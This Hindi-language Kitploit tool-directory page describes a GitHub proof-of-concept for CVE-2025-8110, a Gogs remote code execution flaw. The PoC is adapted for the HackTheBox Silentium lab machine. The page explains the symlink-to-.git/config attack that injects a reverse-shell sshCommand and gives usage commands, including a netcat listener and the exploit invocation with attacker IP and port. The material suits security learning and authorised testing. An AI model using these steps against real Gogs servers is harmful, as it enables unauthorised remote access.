Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8110-Silentium-HTB — CVE-2025-8110 Specifically for the Silentium box on HTB. | Kitploit
उपकरण/GitHubGitHub/hassan-hamadi/cve-2025-8110-silentium-htb
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubhassan-hamadi/cve-2025-8110-silentium-htb

CVE-2025-8110-Silentium-HTB

CVE-2025-8110 Specifically for the Silentium box on HTB.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

अस्वीकरण: यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।


यह zAbuQasem/gogs-CVE-2025-8110 का एक संशोधित संस्करण है, जिसे HackTheBox पर Silentium मशीन के विरुद्ध काम करने के लिए अनुकूलित किया गया है। मूल PoC को Silentium की विशिष्ट Gogs कॉन्फ़िगरेशन और प्रमाणीकरण प्रवाह को संभालने के लिए समायोजन की आवश्यकता थी।


भेद्यता

CVE-2025-8110 Gogs में एक रिमोट कोड निष्पादन भेद्यता है, जो एक स्व-होस्टेड Git सेवा है।

Gogs का फ़ाइल-अपडेट API एंडपॉइंट (PUT /api/v1/repos/.../contents/<file>) यह सत्यापित नहीं करता कि लक्ष्य फ़ाइल एक सिमलिंक है या नहीं। एक प्रमाणित हमलावर एक रिपॉजिटरी में एक सिमलिंक (जो .git/config की ओर इशारा करता है) डाल सकता है, फिर API का उपयोग करके उसे एक दुर्भावनापूर्ण पेलोड से ओवरराइट कर सकता है। पेलोड git कॉन्फ़िग में एक कस्टम sshCommand इंजेक्ट करता है, जिसे Gogs अगली बार उस रिपॉजिटरी पर SSH ऑपरेशन करने पर सर्वर-साइड निष्पादित करता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।


PoC क्या करता है

  1. Gogs में प्रमाणित होता है और लॉगिन पेज से CSRF टोकन प्राप्त करता है।
  2. उपयोगकर्ता सेटिंग्स पेज के माध्यम से Gogs API टोकन उत्पन्न करता है।
  3. SSH सक्षम के साथ API के माध्यम से एक नया रिपॉजिटरी बनाता है।
  4. रिपॉजिटरी को स्थानीय रूप से क्लोन करता है, एक सिमलिंक (malicious_link -> .git/config) लगाता है, और इसे पुश करता है।
  5. सिमलिंक पर फ़ाइल-अपडेट API को कॉल करता है, एक दुर्भावनापूर्ण .git/config लिखता है जिसमें sshCommand = <reverse shell> होता है।
  6. Gogs सिमलिंक का अनुसरण करता है और अपने स्वयं के .git/config को ओवरराइट करता है, अगले SSH ऑपरेशन पर शेल को ट्रिगर करता है।

उपयोग

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

एक लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp <PORT>

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

वैकल्पिक — Burp Suite के माध्यम से रूट करें:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
टूल डाउनलोड करें
FlagDescription
-uGogs बेस URL
-lhआपका हमलावर IP (रिवर्स शेल होस्ट)
-lpआपका लिसनर पोर्ट
-unआपका पंजीकृत Gogs उपयोगकर्ता नाम
-pwआपका Gogs पासवर्ड
-x(वैकल्पिक) localhost:8080 पर Burp के माध्यम से ट्रैफ़िक रूट करें